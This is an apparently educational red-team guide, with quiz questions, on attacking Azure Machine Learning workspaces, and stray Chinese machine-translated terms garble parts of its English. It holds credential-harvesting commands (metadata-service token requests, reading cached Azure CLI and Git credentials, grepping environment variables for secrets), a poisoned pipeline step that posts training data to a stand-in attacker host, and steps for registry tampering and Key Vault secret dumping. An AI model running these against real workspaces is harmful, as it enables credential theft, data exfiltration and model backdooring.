Azure ML 利用ation
Red team attack methodology for Azure Machine Learning: workspace security, compute instance attacks, pipeline poisoning, model registry tampering, and data store exploitation.
Azure ML 利用
Azure Machine Learning is Microsoft's enterprise ML platform providing managed compute, experimentation tracking, automated ML, model deployment, and MLOps pipelines. From a 紅隊 perspective, Azure ML workspaces are high-value targets 因為 they aggregate access to sensitive data, trained models, compute resources, and credentials for external services. A compromised workspace often provides paths to both the ML pipeline and the broader Azure environment.
Workspace 安全
Workspace Architecture
An Azure ML workspace is associated with several dependent Azure resources:
| Resource | Purpose | 攻擊 Relevance |
|---|---|---|
| Azure Storage Account | Default data store for experiments, models, snapshots | 訓練資料 access, model artifact theft |
| Azure Key Vault | Credential storage for workspace secrets | API keys, connection strings, certificates |
| Azure Container Registry | Docker images for 訓練 and deployment | Container image tampering, 供應鏈 attacks |
| Application Insights | Telemetry and 監控 | Log access, operational intelligence |
# Get workspace details and associated resources
az ml workspace show --name <ws> --resource-group <rg> \
--query "{storage:storage_account, keyVault:key_vault, acr:container_registry}"
# List workspace connections (may contain credentials)
az ml connection list --workspace-name <ws> --resource-group <rg>RBAC 利用
Azure ML uses several built-in roles with different privilege levels:
| Role | Capabilities | 紅隊 Interest |
|---|---|---|
AzureML Data Scientist | Run experiments, deploy models, access compute | Training pipeline access, model deployment |
AzureML Compute Operator | Manage compute resources | Create compute for credential theft |
Contributor on workspace | Full workspace management | All workspace operations including connections |
Reader on workspace | View workspace contents | Enumerate assets, view experiment logs |
Compute Instance 攻擊
Compute as a Pivot Point
Azure ML compute instances are managed VMs with Jupyter, VS Code, and terminal access. They function similarly to SageMaker notebook instances as pivot points for lateral movement.
# List compute instances
az ml compute list --workspace-name <ws> --resource-group <rg> --type ComputeInstance
# Get compute details
az ml compute show --name <compute> --workspace-name <ws> --resource-group <rg>
# Access via workspace (creates access URL)
# Navigate to Azure ML Studio > Compute > Instances > ConnectCredential Harvesting
From a compromised compute instance:
# Managed identity 符元 for Azure management
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/符元?api-version=2018-02-01&resource=https://management.azure.com/"
# Managed identity 符元 for storage access
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/符元?api-version=2018-02-01&resource=https://storage.azure.com/"
# Check for cached Azure CLI credentials
cat ~/.azure/accessTokens.json 2>/dev/null
cat ~/.azure/msal_token_cache.json 2>/dev/null
# Check environment variables for credentials
env | grep -i -E "(key|secret|password|符元|connection)"
# Check for Git credentials (common on data science instances)
cat ~/.git-credentials 2>/dev/null
git config --global credential.helperStartup Script 攻擊
Azure ML compute instances support setup scripts that run on creation. If modifiable, these scripts provide persistence:
# Check if the compute has a setup script
az ml compute show --name <compute> --workspace-name <ws> --resource-group <rg> \
--query "setup_scripts"Shared Compute Risks
When multiple data scientists share a workspace, compute instances may be accessible to other workspace users depending on configuration:
- SSH access: If SSH is enabled, other workspace users with the SSH key can access the instance
- Shared file systems: Workspace-level file shares may be mounted across compute instances
- Terminal access: Workspace contributors can access terminal sessions on any compute instance in the workspace
Pipeline Poisoning
Pipeline Architecture
Azure ML pipelines define multi-step ML workflows: data preprocessing, feature engineering, model 訓練, 評估, and deployment. Pipelines are defined as code (Python SDK or YAML) and executed on workspace compute.
攻擊 Vectors
Pipeline definition tampering
Modify pipeline definitions to inject malicious steps. If pipeline code is stored in a connected Git repository, compromise the repository to modify pipeline logic.
# Injected pipeline step that exfiltrates 訓練資料 - name: exfiltrate_data command: > curl -X POST https://攻擊者.com/collect -d @${{inputs.training_data}} environment: azureml:default-env:1 compute: azureml:cpu-clusterEnvironment manipulation
Azure ML environments define the software dependencies for pipeline steps. Tampering with environment definitions allows dependency injection:
# List environments az ml environment list --workspace-name <ws> --resource-group <rg> # Register a modified environment with malicious packages az ml environment create --file modified-env.yml \ --workspace-name <ws> --resource-group <rg>Component substitution
Azure ML pipelines use reusable components. Registering a malicious component with the same name (but a newer version) causes pipelines to pick up the tampered version on their next execution.
Schedule manipulation
Pipelines can run on schedules. Modifying a schedule to trigger a poisoned pipeline at a specific time allows timed attacks:
# List schedules az ml schedule list --workspace-name <ws> --resource-group <rg>
Model Registry Tampering
Registry Structure
The Azure ML model registry stores model versions with metadata, lineage tracking, and deployment state. It serves as the source of truth for which model versions are deployed to production endpoints.
# List registered models
az ml model list --workspace-name <ws> --resource-group <rg>
# Get model details including artifact location
az ml model show --name <model> --version <ver> \
--workspace-name <ws> --resource-group <rg>Tampering Techniques
| Technique | Method | Impact |
|---|---|---|
| Version injection | Register a new version of an existing model with tampered artifacts | Next deployment picks up backdoored model |
| Artifact replacement | Modify model files in the backing storage account | Deployed model serves 攻擊者-controlled predictions |
| Metadata manipulation | Change model tags or properties to influence selection | Automated pipelines deploy the wrong model |
| Lineage spoofing | Register models with fabricated experiment lineage | Bypass provenance checks |
Deployment Hijacking
Azure ML supports managed online endpoints (fully managed) and Kubernetes online endpoints (customer-managed AKS):
# List online endpoints
az ml online-endpoint list --workspace-name <ws> --resource-group <rg>
# Get endpoint details
az ml online-endpoint show --name <endpoint> \
--workspace-name <ws> --resource-group <rg>
# List deployments within an endpoint
az ml online-deployment list --endpoint-name <endpoint> \
--workspace-name <ws> --resource-group <rg>Deployment hijacking: update an existing deployment to point to a tampered model version, or modify traffic routing to send requests to 攻擊者-controlled deployment.
Data Store 利用
Data Store Architecture
Azure ML data stores are abstractions over Azure storage services. They store credentials or use managed identity to access underlying storage:
# List data stores
az ml datastore list --workspace-name <ws> --resource-group <rg>
# Get data store details (may reveal storage account names, container names)
az ml datastore show --name <datastore> \
--workspace-name <ws> --resource-group <rg>Credential Extraction
Data stores can authenticate using:
- Account keys: Stored in the workspace Key Vault
- SAS 符元: Time-limited but may have broad scope
- Managed identity: Workspace identity with storage access
- Service principal: Application credentials stored in Key Vault
# Access Key Vault secrets (if workspace identity or user has access)
az keyvault secret list --vault-name <vault>
az keyvault secret show --vault-name <vault> --name <secret>Data Access Through Workspace Identity
The workspace's managed identity typically has Storage Blob Data Contributor or Storage Blob Data Reader on connected storage accounts. From a compromised compute instance:
from azure.identity import ManagedIdentityCredential
from azure.storage.blob import BlobServiceClient
credential = ManagedIdentityCredential()
blob_service = BlobServiceClient(
account_url="https://<storage>.blob.core.windows.net",
credential=credential
)
# List containers and blobs
for container in blob_service.list_containers():
print(f"Container: {container.name}")
container_client = blob_service.get_container_client(container.name)
for blob in container_client.list_blobs():
print(f" Blob: {blob.name}")相關主題
- Azure AI Services 概覽 -- Service landscape and enumeration
- Azure OpenAI 攻擊 Surface -- Azure OpenAI-specific attacks
- Defender for AI Bypass -- Evading 偵測 during 利用
- SageMaker 利用 -- Comparable AWS ML platform attacks
You have the AzureML Data Scientist role on a workspace. Which of the following can you NOT do?
Why is Azure ML pipeline 投毒 particularly difficult to detect?
參考文獻
- Azure ML 安全 -- Enterprise 安全 documentation
- Azure ML RBAC -- Role-based access control
- Azure ML Data Stores -- Data store configuration